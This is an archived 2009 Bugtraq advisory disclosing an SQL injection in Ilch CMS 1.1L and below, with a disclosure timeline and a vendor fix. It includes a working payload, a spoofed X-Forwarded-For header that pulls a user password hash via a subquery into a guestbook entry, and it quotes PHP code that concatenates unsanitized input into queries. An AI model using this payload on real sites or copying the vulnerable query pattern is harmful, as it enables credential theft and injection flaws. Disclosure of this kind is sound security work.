| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 06 Feb 2009 18:28:13 +0100
From: Gizmore <gizmore@...hall.net>
To: bugtraq@...urityfocus.com
Subject: Vulnerable: Ilch CMS
Ilch CMS (from http://ilch.de) is vulnerable to sql-injection
Prone to the vulnerabilty are the guestbook and the statistics.
- Affected Versions: ilch 1.1L and below
- Not vulnerable: ilch 1.1M
- Exploit: Spoof your x-forwarded-for header to:
127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0
ORDER BY `id` LIMIT 1)) /*
Then create a guestbook entry.
- Timeline:
3.Feb.09: Vuln reported to ilch.de
3.Feb.09: Got reply from ilch
4.Feb.09: Version 1.1M is available which fixes the issue
Here is a summary of the vulnerability:
# in include/includes/func/statistics.php is missing user input
sanitization:
function getip() {
if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
return ($_SERVER["HTTP_X_FORWARDED_FOR"]);
} else {
return ($_SERVER["REMOTE_ADDR"]);
}
}
# in include/contents/gbook.php getip() is used without validation
db_query("INSERT INTO prefix_gbook
(`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."',
'".$page."', '".time()."', '".getip()."', '".$txt."')");
# There is also getip() used in includes/func/user.php, but its way harder
to exploit:
db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES
('".session_id()."',now(),'".getip()."')");
Please credit the discovery to Gizmore from wechall.net :)
Kind Regards
Gizmore
Powered by blists - more mailing lists